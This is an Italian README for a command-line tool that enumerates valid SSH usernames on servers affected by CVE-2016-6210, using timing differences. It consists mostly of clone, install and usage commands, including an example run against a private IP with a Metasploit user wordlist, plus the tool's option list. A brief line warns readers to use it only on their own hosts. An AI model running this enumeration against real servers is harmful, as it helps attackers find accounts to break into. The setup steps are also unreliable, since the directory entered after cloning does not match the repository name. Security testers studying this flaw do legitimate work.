
Enumerazione dei nomi utente contro i daemon SSH affetti da CVE-2016-6210.
Enumerazione dei nomi utente contro i daemon SSH affetti da CVE-2016-6210.
Usalo solo contro i tuoi host! Attaccare sistemi su cui non sei autorizzato potrebbe metterti nei guai seri!
git clone https://github.com/coolbabayaga/CVE-2016-6210.git
cd ssh-enum-cve-2016-6210
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
40136.py -h
example: 40136.py -U /usr/share/wordlists/metasploit/unix_users.txt -e -s 192.168.44.63:22
argomenti posizionali: host Indica l'indirizzo del server SSH come ip:porta o solo ip
opzioni: -h, --help mostra questo messaggio di aiuto ed esci -u, --user USER Fornisci un singolo nome utente -U, --userlist USERLIST Fornisci un file contenente un elenco di utenti -e, --enumerated Mostra solo gli utenti enumerati -s, --silent Modalità silenziosa --bytes BYTES Byte da inviare come password --samples SAMPLES Campioni per il timing di riferimento --factor FACTOR Fattore per la soglia di timing --trials TRIALS Tentativi per utente